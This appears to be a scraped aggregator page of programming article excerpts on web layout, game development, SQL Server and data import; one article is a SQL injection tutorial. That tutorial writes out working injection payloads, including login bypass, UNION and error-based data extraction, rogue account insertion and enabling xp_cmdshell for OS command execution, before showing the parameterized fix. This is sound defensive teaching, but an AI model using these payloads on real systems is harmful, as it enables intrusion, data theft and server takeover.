                    xPos = 120 + (Math.floor(Math.random()*($('#page').width()-100)));
                }while(xPos+$('#image img.current').width()>$('#page').width());
            }
            if($('#image img.current').height()>=300){
                yPos=0;
            }else{
                do{
                    yPos = Math.floor(Math.random()*300);
                }while(yPos+$('#image img.current').height()>300);
            }
            $('#image img.current').css({'left':xPos,'top':yPos});
        });
    });

    Read the article

  • Isometric displaying two different images in different positions

    - by Canvas
    I'm creating a simple isometric game using HTML5 and JavaScript, but I can't seem to get the display to work. At the moment I have 9 tiles that have X and Y positions, and the player has an X and Y position; the player's X and Y properties are set to 100, and the tiles are as shown:

    tiles[0] = new Array(3);
    tiles[1] = new Array(3);
    tiles[2] = new Array(3);

    tiles[0][0] = new point2D( 100, 100);
    tiles[0][1] = new point2D( 160, 100);
    tiles[0][2] = new point2D( 220, 100);
    tiles[1][0] = new point2D( 100, 160);
    tiles[1][1] = new point2D( 160, 160);
    tiles[1][2] = new point2D( 220, 160);
    tiles[2][0] = new point2D( 100, 220);
    tiles[2][1] = new point2D( 160, 220);
    tiles[2][2] = new point2D( 220, 220);

    Now I use this method to work out the isometric position:

    function twoDToIso( point ) {
        var cords = point2D;
        cords.x = point.x - point.y;
        cords.y = (point.x + point.y) / 2;
        return cords;
    }

    point2D is:

    function point2D( x, y) {
        this.x = x;
        this.y = y;
    }

    Now I'm sure this does work out the correct positioning, but here is the output: Isometric view

    I just need to move my player position a tiny bit, but is that the best way to display my player position in the right position?

    Canvas

    P.S. the tile width is 120 and height is 60, and the player is width 30 by height 15

    Read the article

  • SQL SERVER – Import CSV into Database – Transferring File Content into a Database Table using CSVexpress

    - by pinaldave
    One of the most common data integration tasks I run into is a desire to move data from a file into a database table.  Generally the user is familiar with his data, the structure of the file, and the database table, but is unfamiliar with data integration tools and therefore views this task as something that is difficult.  What these users really need is a point and click approach that minimizes the learning curve for the data integration tool.  This is what CSVexpress (www.CSVexpress.com) is all about!  It is based on expressor Studio, a data integration tool I’ve been reviewing over the last several months.

    With CSVexpress, moving data between data sources can be as simple as providing the database connection details, describing the structure of the incoming and outgoing data and then connecting two pre-programmed operators.   There’s no need to learn the intricacies of the data integration tool or to write code.  Let’s look at an example.

    Suppose I have a comma separated value data file with data similar to the following, which is a listing of terminated employees that includes their hiring and termination date, department, job description, and final salary.

    EMP_ID,STRT_DATE,END_DATE,JOB_ID,DEPT_ID,SALARY
    102,13-JAN-93,24-JUL-98 17:00,Programmer,60,"$85,000"
    101,21-SEP-89,27-OCT-93 17:00,Account Representative,110,"$65,000"
    103,28-OCT-93,15-MAR-97 17:00,Account Manager,110,"$75,000"
    304,17-FEB-96,19-DEC-99 17:00,Marketing,20,"$45,000"
    333,24-MAR-98,31-DEC-99 17:00,Data Entry Clerk,50,"$35,000"
    100,17-SEP-87,17-JUN-93 17:00,Administrative Assistant,90,"$40,000"
    334,24-MAR-98,31-DEC-98 17:00,Sales Representative,80,"$40,000"
    400,01-JAN-99,31-DEC-99 17:00,Sales Manager,80,"$55,000"

    Notice the concise format used for the date values, the fact that the termination date includes both date and time information, and that the salary is clearly identified as money by the dollar sign and digit grouping.  In moving this data to a database table I want to express the dates using a format that includes the century since it’s obvious that this listing could include employees who left the company in both the 20th and 21st centuries, and I want the salary to be stored as a decimal value without the currency symbol and grouping character.  Most data integration tools would require coding within a transformation operation to effect these changes, but not expressor Studio.  Directives for these modifications are included in the description of the incoming data.

    Besides starting the expressor Studio tool and opening a project, the first step is to create connection artifacts, which describe to expressor where data is stored.  For this example, two connection artifacts are required: a file connection, which encapsulates the file system location of my file; and a database connection, which encapsulates the database connection information.  With expressor Studio, I use wizards to create these artifacts.

    First click New Connection > File Connection in the Home tab of expressor Studio’s ribbon bar, which starts the File Connection wizard.  In the first window, I enter the path to the directory that contains the input file.  Note that the file connection artifact only specifies the file system location, not the name of the file.

    Then I click Next and enter a meaningful name for this connection artifact; clicking Finish closes the wizard and saves the artifact.
    To create the Database Connection artifact, I must know the location, or instance name, of the target database and have the credentials of an account with sufficient privileges to write to the target table.  To use expressor Studio’s features to the fullest, this account should also have the authority to create a table.

    I click New Connection > Database Connection in the Home tab of expressor Studio’s ribbon bar, which starts the Database Connection wizard.  expressor Studio includes high-performance drivers for many relational database management systems, so I can simply make a selection from the “Supplied database drivers” drop down control.  If my desired RDBMS isn’t listed, I can optionally use an existing ODBC DSN by selecting the “Existing DSN” radio button.

    In the following window, I enter the connection details.  With Microsoft SQL Server, I may choose to use Windows Authentication rather than account credentials.  After clicking Next, I enter a meaningful name for this connection artifact and clicking Finish closes the wizard and saves the artifact.

    Now I create a schema artifact, which describes the structure of the file data.  When expressor reads a file, all data fields are typed as strings.  In some use cases this may be exactly what is needed and there is no need to edit the schema artifact.  But in this example, editing the schema artifact will be used to specify how the data should be transformed; that is, reformat the dates to include century designations, change the employee and department IDs to integers, and convert the salary to a decimal value.

    Again a wizard is used to create the schema artifact.  I click New Schema > Delimited Schema in the Home tab of expressor Studio’s ribbon bar, which starts the Delimited Schema wizard.  In the first window, I click Get Data from File, which then displays a listing of the file connections in the project.  When I click on the file connection I previously created, a browse window opens to this file system location; I then select the file and click Open, which imports 10 lines from the file into the wizard.

    I now view the file’s content and confirm that the appropriate delimiter characters are selected in the “Field Delimiter” and “Record Delimiter” drop down controls; then I click Next.  Since the input file includes a header row, I can easily indicate that fields in the file should be identified through the corresponding header value by clicking “Set All Names from Selected Row.”  Alternatively, I could enter a different identifier into the Field Details > Name text box.  I click Next and enter a meaningful name for this schema artifact; clicking Finish closes the wizard and saves the artifact.

    Now I open the schema artifact in the schema editor.  When I first view the schema’s content, I note that the types of all attributes in the Semantic Type (the right-hand panel) are strings and that the attribute names are the same as the field names in the data file.  To change an attribute’s name and type, I highlight the attribute and click Edit in the Attributes grouping on the Schema > Edit tab of the editor’s ribbon bar.  This opens the Edit Attribute window; I can change the attribute name and select the desired type from the “Data type” drop down control.  In this example, I change the name of each attribute to the name of the corresponding database table column (EmployeeID, StartingDate, TerminationDate, JobDescription, DepartmentID, and FinalSalary).
    Then for the EmployeeID and DepartmentID attributes, I select Integer as the data type, for the StartingDate and TerminationDate attributes, I select Datetime as the data type, and for the FinalSalary attribute, I select the Decimal type.

    But I can do much more in the schema editor.  For the datetime attributes, I can set a constraint that ensures that the data adheres to some predetermined specifications; a starting date must be later than January 1, 1980 (the date on which the company began operations) and a termination date must be earlier than 11:59 PM on December 31, 1999.  I simply select the appropriate constraint and enter the value (1980-01-01 00:00 as the starting date and 1999-12-31 11:59 as the termination date).

    As a last step in setting up these datetime conversions, I edit the mapping, describing the format of each datetime type in the source file.  I highlight the mapping line for the StartingDate attribute and click Edit Mapping in the Mappings grouping on the Schema > Edit tab of the editor’s ribbon bar.  This opens the Edit Mapping window in which I either enter, or select, a format that describes how the datetime values are represented in the file.  Note the use of Y01 as the syntax for the year.  This syntax is the indicator to expressor Studio to derive the century by setting any year later than 01 to the 20th century and any year before 01 to the 21st century.  As each datetime value is read from the file, the year values are transformed into century and year values.

    For the TerminationDate attribute, my format also indicates that the datetime value includes hours and minutes.

    And now to the Salary attribute.  I open its mapping and in the Edit Mapping window select the Currency tab and the “Use currency” check box.  This indicates that the file data will include the dollar sign (or in Europe the Pound or Euro sign), which should be removed.  And on the Grouping tab, I select the “Use grouping” checkbox and enter 3 into the “Group size” text box, a comma into the “Grouping character” text box, and a decimal point into the “Decimal separator” character text box.  These entries allow the string to be properly converted into a decimal value.

    By making these entries into the schema that describes my input file, I’ve specified how I want the data transformed prior to writing to the database table and completely removed the requirement for coding within the data integration application itself.

    Assembling the data integration application is simple.  Onto the canvas I drag the Read File and Write Table operators, connecting the output of the Read File operator to the input of the Write Table operator.

    Next, I select the Read File operator and its Properties panel opens on the right-hand side of expressor Studio.  For each property, I can select an appropriate entry from the corresponding drop down control.  Clicking on the button to the right of the “File name” text box opens the file system location specified in the file connection artifact, allowing me to select the appropriate input file.  I indicate also that the first row in the file, the header row, should be skipped, and that any record that fails one of the datetime constraints should be skipped.

    I then select the Write Table operator and in its Properties panel specify the database connection, normal for the “Mode,” and the “Truncate” and “Create Missing Table” options.
    If my target table does not yet exist, expressor will create the table using the information encapsulated in the schema artifact assigned to the operator.

    The last task needed to complete the application is to create the schema artifact used by the Write Table operator.  This is extremely easy as another wizard is capable of using the schema artifact assigned to the Read File operator to create a schema artifact for the Write Table operator.  In the Write Table Properties panel, I click the drop down control to the right of the “Schema” property and select “New Table Schema from Upstream Output…” from the drop down menu.

    The wizard first displays the table description and in its second screen asks me to select the database connection artifact that specifies the RDBMS in which the target table will exist.  The wizard then connects to the RDBMS and retrieves a list of database schemas from which I make a selection.  The fourth screen gives me the opportunity to fine tune the table’s description.  In this example, I set the width of the JobDescription column to a maximum of 40 characters and select money as the type of the FinalSalary column.  I also provide the name for the table.

    This completes development of the application.  The entire application was created through the use of wizards and the required data transformations specified through simple constraints and specifications rather than through coding.  To develop this application, I only needed a basic understanding of expressor Studio, a level of expertise that can be gained by working through a few introductory tutorials.  expressor Studio is as close to a point and click data integration tool as one could want and I urge you to try this product if you have a need to move data between files or from files to database tables.

    Check out CSVexpress in more detail.  It offers a few basic video tutorials and a preview of expressor Studio 3.5, which will support the reading and writing of data into Salesforce.com.

    Reference: Pinal Dave (http://blog.SQLAuthority.com) Filed under: Pinal Dave, PostADay, SQL, SQL Authority, SQL Documentation, SQL Download, SQL Query, SQL Server, SQL Tips and Tricks, SQLServer, T SQL, Technology
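    For readers who would rather script a load like this in plain T-SQL instead of using a point and click tool, here is a rough sketch of the same import done with BULK INSERT and a staging table.  This is my illustration, not part of the article: the file path and object names are assumptions, and the FORMAT = 'CSV' option (which handles the quoted salary field) requires SQL Server 2017 or later.

    -- Stage the raw text first; every column arrives as a string.
    CREATE TABLE dbo.EmpStage
    (
        EMP_ID    VARCHAR(10),
        STRT_DATE VARCHAR(30),
        END_DATE  VARCHAR(30),
        JOB_ID    VARCHAR(40),
        DEPT_ID   VARCHAR(10),
        SALARY    VARCHAR(20)
    );

    BULK INSERT dbo.EmpStage
    FROM 'C:\import\terminated_employees.csv'   -- assumed location
    WITH (FORMAT = 'CSV',   -- SQL Server 2017+; strips quotes, keeps the comma inside "$85,000"
          FIRSTROW = 2);    -- skip the header row

    -- Convert while copying to the destination: CONVERT handles the DD-MON-YY dates
    -- (years 87-99 fall in the 20th century under the default two-digit year cutoff),
    -- and the money type accepts the dollar sign and grouping commas directly.
    SELECT EmployeeID      = CONVERT(INTEGER, EMP_ID),
           StartingDate    = CONVERT(DATETIME, STRT_DATE),
           TerminationDate = CONVERT(DATETIME, END_DATE),
           JobDescription  = JOB_ID,
           DepartmentID    = CONVERT(INTEGER, DEPT_ID),
           FinalSalary     = CONVERT(MONEY, SALARY)
    FROM dbo.EmpStage;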

    Read the article

  • SQL SERVER – Identify Most Resource Intensive Queries – SQL in Sixty Seconds #029 – Video

    - by pinaldave
    There are a few questions I often get asked, and it is interesting that in our daily work many of us need the same kind of information at around the same time. Here are examples of those similar questions:

    How many user-created tables are there in the database?
    How many non-clustered indexes does each table in the database have?
    Is a table a heap, or does it have a clustered index on it?
    How many rows does each table in the database contain?

    I finally wrote down a very quick script (it took less than sixty seconds when I originally wrote it) which can answer the above questions. I also created a very quick video to explain the results and how to execute the script. Here is the complete script which I have used in the SQL in Sixty Seconds video.

    SELECT [schema_name] = s.name,
           table_name = o.name,
           MAX(i1.type_desc) ClusteredIndexorHeap,
           COUNT(i.TYPE) NoOfNonClusteredIndex,
           p.rows
    FROM sys.indexes i
    INNER JOIN sys.objects o ON i.[object_id] = o.[object_id]
    INNER JOIN sys.schemas s ON o.[schema_id] = s.[schema_id]
    LEFT JOIN sys.partitions p ON p.OBJECT_ID = o.OBJECT_ID AND p.index_id IN (0,1)
    LEFT JOIN sys.indexes i1 ON i.OBJECT_ID = i1.OBJECT_ID AND i1.TYPE IN (0,1)
    WHERE o.TYPE IN ('U')
    AND i.TYPE = 2
    GROUP BY s.name, o.name, p.rows
    ORDER BY schema_name, table_name

    Related Tips in SQL in Sixty Seconds:
    Find Row Count in Table – Find Largest Table in Database
    Find Row Count in Table – Find Largest Table in Database – T-SQL
    Identify Numbers of Non Clustered Index on Tables for Entire Database
    Index Levels, Page Count, Record Count and DMV – sys.dm_db_index_physical_stats
    Index Levels and Delete Operations – Page Level Observation

    What would you like to see in the next SQL in Sixty Seconds video?

    Reference: Pinal Dave (http://blog.sqlauthority.com) Filed under: Database, Pinal Dave, PostADay, SQL, SQL Authority, SQL in Sixty Seconds, SQL Query, SQL Scripts, SQL Server, SQL Server Management Studio, SQL Tips and Tricks, T SQL, Technology, Video Tagged: Excel
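    The script above covers the table and index questions; for the resource-intensive queries mentioned in the title, a common approach is to read the plan cache through sys.dm_exec_query_stats. The sketch below is my addition rather than part of the post, and it orders cached statements by total CPU time:

    -- Sketch: top cached statements by total worker (CPU) time.
    SELECT TOP (10)
           qs.execution_count,
           qs.total_worker_time,
           qs.total_logical_reads,
           SUBSTRING(st.[text], (qs.statement_start_offset / 2) + 1,
               ((CASE qs.statement_end_offset
                     WHEN -1 THEN DATALENGTH(st.[text])
                     ELSE qs.statement_end_offset
                 END - qs.statement_start_offset) / 2) + 1) AS statement_text
    FROM sys.dm_exec_query_stats AS qs
    CROSS APPLY sys.dm_exec_sql_text(qs.sql_handle) AS st
    ORDER BY qs.total_worker_time DESC;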

    Read the article

  • Jumping Vs. Gravity

    - by PhaDaPhunk
    Hi, I'm working on my first XNA 2D game and I have a little problem. If I jump, my sprite jumps but does not fall back down. I also have another problem: the user can hold the spacebar to jump as high as he wants, and I don't know how to keep him from doing that. Here's my code:

    The jump:

    if (FaKeyboard.IsKeyDown(Keys.Space))
    {
        Jumping = true;
        xPosition -= new Vector2(0, 5);
    }
    if (xPosition.Y >= 10)
    {
        Jumping = false;
        Grounded = false;
    }

    The really simple basic gravity:

    if (!Grounded && !Jumping)
    {
        xPosition += new Vector2(1, 3) * speed;
    }

    Here's where Grounded is set to true or false, with a collision rectangle:

    MegamanRectangle = new Rectangle((int)xPosition.X, (int)xPosition.Y, FrameSizeDraw.X, FrameSizeDraw.Y);
    Rectangle Block1Rectangle = new Rectangle((int)0, (int)73, Block1.Width, Block1.Height);
    Rectangle Block2Rectangle = new Rectangle((int)500, (int)73, Block2.Width, Block2.Height);
    if ((MegamanRectangle.Intersects(Block1Rectangle) || (MegamanRectangle.Intersects(Block2Rectangle))))
    {
        Grounded = true;
    }
    else
    {
        Grounded = false;
    }

    The Grounded bool and the gravity have been tested and are working. Any ideas why? Thanks in advance and don't hesitate to ask if you need another part of the code.

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage.

    A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text.

    SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, have no input clean-up or validation, allow applications to connect with elevated (e.g. sa) privileges, and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences.

    The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will become clear as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability:

    1) Concatenating SQL statements on the client by hand
    2) Using parameterized stored procedures but passing in parts of SQL statements

    As will become clear, SQL injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem.

    Concatenating SQL statements on the client

    This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL.

    In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data, then the C# code with the actual SQL injection example from beginning to end. The comments in the code provide information on what actually happens.

    /* SQL CODE */
    /* Users table holds usernames and passwords and is the object of our hacking attempt */
    CREATE TABLE Users
    (
        UserId INT IDENTITY(1, 1) PRIMARY KEY,
        UserName VARCHAR(50),
        UserPassword NVARCHAR(10)
    )
    /* Insert 2 users */
    INSERT INTO Users(UserName, UserPassword)
    SELECT 'User 1', 'MyPwd'
    UNION ALL
    SELECT 'User 2', 'BlaBla'

    Vulnerable C# code, followed by a progressive SQL injection attack.

    /* .NET C# CODE */
    /* This method checks if a user exists. It uses SQL concatenation on the client,
       which is susceptible to SQL injection attacks */
    private bool DoesUserExist(string username, string password)
    {
        using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;"))
        {
            /* This is the SQL string you usually see with novice developers.
               It returns a row if a user exists and no rows if it doesn't */
            string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'";
            SqlCommand cmd = conn.CreateCommand();
            cmd.CommandText = sql;
            cmd.CommandType = CommandType.Text;
            cmd.Connection.Open();
            DataSet dsResult = new DataSet();
            /* If a user doesn't exist the cmd.ExecuteScalar() returns null;
               this is just to simplify the example; you can use other Execute methods too */
            string userExists = (cmd.ExecuteScalar() ?? "0").ToString();
            return userExists != "0";
        }
    }

    /* The SQL injection attack example. Username inputs should be run
       one after the other, to demonstrate the attack pattern. */
    string username = "User 1";
    string password = "MyPwd";

    // See if we can even use SQL injection.
    // By simply using this we can log into the application
    username = "' OR 1=1 --";

    // What follows is a step-by-step guessing game designed to find out
    // column names used in the query, via the error messages.
    // By using GROUP BY we will get the column names one by one.
    // First try the Id
    username = "' GROUP BY Id HAVING 1=1--";
    // We get the SQL error: Invalid column name 'Id'.
    // From that we know that there's no column named Id.
    // Next up is UserID
    username = "' GROUP BY Users.UserId HAVING 1=1--";
    // AHA! Here we get the error: Column 'Users.UserName' is invalid in the
    // SELECT list because it is not contained in either an aggregate function
    // or the GROUP BY clause.
    // We have guessed correctly that there is a column called UserId and the
    // error message has kindly informed us of a table called Users with a
    // column called UserName.
    // Now we add UserName to our GROUP BY
    username = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";
    // We get the same error as before but with a new column name, Users.UserPassword.
    // Repeat this pattern till we have all column names that are being returned by the query.

    // Now we have to get the column data types. One non-string data type
    // is all we need to wreak havoc.
    // Because 0 can be implicitly converted to any data type in SQL Server
    // we use it to fill up the UNION. This can be done because we know the
    // number of columns the query returns from our previous hacks.
    // Because SUM works for UserId we know it's an integer type.
    // It doesn't matter which exactly.
    username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";
    // SUM() errors out for UserName and UserPassword columns giving us their data types:
    // Error: Operand data type varchar is invalid for SUM operator.
    username = "' UNION SELECT SUM(Users.UserName) FROM Users--";
    // Error: Operand data type nvarchar is invalid for SUM operator.
    username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";

    // Because we know the Users table structure we can insert our data into it
    username = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";

    // Next let's get the actual data from the tables.
    // There are 2 ways you can do this.
    // The first is by using MIN on the varchar UserName column and getting
    // the data from error messages one by one like this:
    username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";
    username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";
    // We can repeat this method until we get all data one by one.
    // The second method gives us all data at once and we can use it
    // as soon as we find a non-string column
    username = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";
    // The error we get is:
    // Conversion failed when converting the nvarchar value
    // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>
    // <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>
    // <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>'
    // to data type int.
    // We can see that the returned XML contains all table data,
    // including our injected user account.

    // By using the XML trick we can get any database or server info we wish,
    // as long as we have access. Some examples:
    // Get info for all databases
    username = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";
    // Get info for all tables in master database
    username = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";

    // If that's not enough, here's a way the attacker can gain shell access
    // to your underlying Windows server. This can be done by enabling and
    // using the xp_cmdshell stored procedure.
    // Enable xp_cmdshell
    username = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";
    // Create a table to store the values returned by xp_cmdshell
    username = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";
    // List files in the current SQL Server directory with xp_cmdshell
    // and store the output in the ShellHack table
    username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";
    // Return the data via an error message
    username = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";
    // Delete the table to get clean output (this step is optional)
    username = "'; DELETE ShellHack; --";
    // Repeat the upper 3 statements to do other nasty stuff to the Windows server

    // If the returned XML is larger than 8k you'll get the
    // "String or binary data would be truncated." error.
    // To avoid this, chunk up the returned XML using paging techniques.

    // the username and password params come from the GUI textboxes.
    bool userExists = DoesUserExist(username, password);

    Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as shown in the following example.

    /* The fixed C# method that doesn't suffer from SQL injection because it uses parameters. */
    private bool DoesUserExist(string username, string password)
    {
        using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;"))
        {
            // This is the version of the SQL string that should be safe from SQL injection
            string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password";
            SqlCommand cmd = conn.CreateCommand();
            cmd.CommandText = sql;
            cmd.CommandType = CommandType.Text;
            // adding 2 SQL Parameters solves the SQL injection issue completely
            SqlParameter usernameParameter = new SqlParameter();
            usernameParameter.ParameterName = "@username";
            usernameParameter.DbType = DbType.String;
            usernameParameter.Value = username;
            cmd.Parameters.Add(usernameParameter);
            SqlParameter passwordParameter = new SqlParameter();
            passwordParameter.ParameterName = "@password";
            passwordParameter.DbType = DbType.String;
            passwordParameter.Value = password;
            cmd.Parameters.Add(passwordParameter);
            cmd.Connection.Open();
            DataSet dsResult = new DataSet();
            /* If a user doesn't exist the cmd.ExecuteScalar() returns null;
               this is just to simplify the example; you can use other Execute methods too */
            string userExists = (cmd.ExecuteScalar() ?? "0").ToString();
            return userExists != "0";
        }
    }

    We have seen just how much danger we're in if our code is vulnerable to SQL injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period.

    Incorrect parameterization in stored procedures

    It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup.

    /* Create a single master access stored procedure */
    CREATE PROCEDURE spSingleAccessSproc
    (
        @select NVARCHAR(500) = '',
        @tableName NVARCHAR(500) = '',
        @where NVARCHAR(500) = '1=1',
        @orderBy NVARCHAR(500) = '1'
    )
    AS
    EXEC('SELECT ' + @select +
         ' FROM ' + @tableName +
         ' WHERE ' + @where +
         ' ORDER BY ' + @orderBy)
    GO

    /* Valid use as anticipated by a novice developer */
    EXEC spSingleAccessSproc
        @select = '*',
        @tableName = 'Users',
        @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''',
        @orderBy = 'UserID'

    /* Malicious use: SQL injection.
       The SQL injection principles are the same as with SQL string concatenation
       I described earlier, so I won't repeat them again here. */
    EXEC spSingleAccessSproc
        @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --',
        @tableName = '--Users',
        @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''',
        @orderBy = '--UserID'

    One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using properly parameterized SQL you have a vulnerability, and SQL injection can bare its ugly teeth.
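    If a generic procedure that takes object names really cannot be avoided, the exposure can at least be reduced by validating the identifier, quoting it with QUOTENAME, and binding every value through sp_executesql. The following is a sketch of that pattern; it is my addition rather than code from the article, and it assumes an unqualified table name resolved in the caller's default schema.

    -- Sketch: dynamic SQL with a validated, quoted identifier and parameterized values.
    CREATE PROCEDURE spSaferUserLookup
        @tableName SYSNAME,        -- identifier: checked and quoted, never pasted in raw
        @userName  NVARCHAR(50)    -- value: always bound as a parameter
    AS
    BEGIN
        -- Refuse names that don't resolve to an existing user table
        IF OBJECT_ID(@tableName, N'U') IS NULL
            RETURN;

        DECLARE @sql NVARCHAR(MAX) =
            N'SELECT * FROM ' + QUOTENAME(@tableName) +
            N' WHERE UserName = @userName;';

        -- The user-supplied value travels as a parameter, not as SQL text
        EXEC sys.sp_executesql
            @sql,
            N'@userName NVARCHAR(50)',
            @userName = @userName;
    END;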

    Read the article

  • java slick2D - problem using ScalableGame class

    - by nellykvist
    I have a problem adjusting the size of the screen using the ScalableGame class from the Slick2D library. What I want to achieve: whenever I change the display size, the background should adjust to the screen size, and objects (images, graphic shapes) should fit (scale).

    Alright, so this is how the state looks by default. I can change the screen size, but images and graphic shapes do not scale:

    appGameContainer = new AppGameContainer(
        new ScalableGame(new AppStateController(), Settings.video.getWidth(), Settings.video.getHeight(), true)
    );
    appGameContainer.setDisplayMode(Settings.video.getWidth(), Settings.video.getHeight(), Settings.video.isFullScreen());
    appGameContainer.start();

    If I assign width/height +100 in the ScalableGame constructor:

    appGameContainer = new AppGameContainer(
        new ScalableGame(new AppStateController(), Settings.video.getWidth() + 100, Settings.video.getHeight() + 100, true)
    );
    appGameContainer.setDisplayMode(Settings.video.getWidth(), Settings.video.getHeight(), Settings.video.isFullScreen());
    appGameContainer.start();

    If I assign width/height +100 to the display:

    appGameContainer = new AppGameContainer(
        new ScalableGame(new AppStateController(), Settings.video.getWidth(), Settings.video.getHeight(), true)
    );
    appGameContainer.setDisplayMode(Settings.video.getWidth() + 100, Settings.video.getHeight() + 100, Settings.video.isFullScreen());
    appGameContainer.start();

    Read the article

< Previous Page | 239 240 241 242 243 244 245 246 247 248 249 250  | Next Page >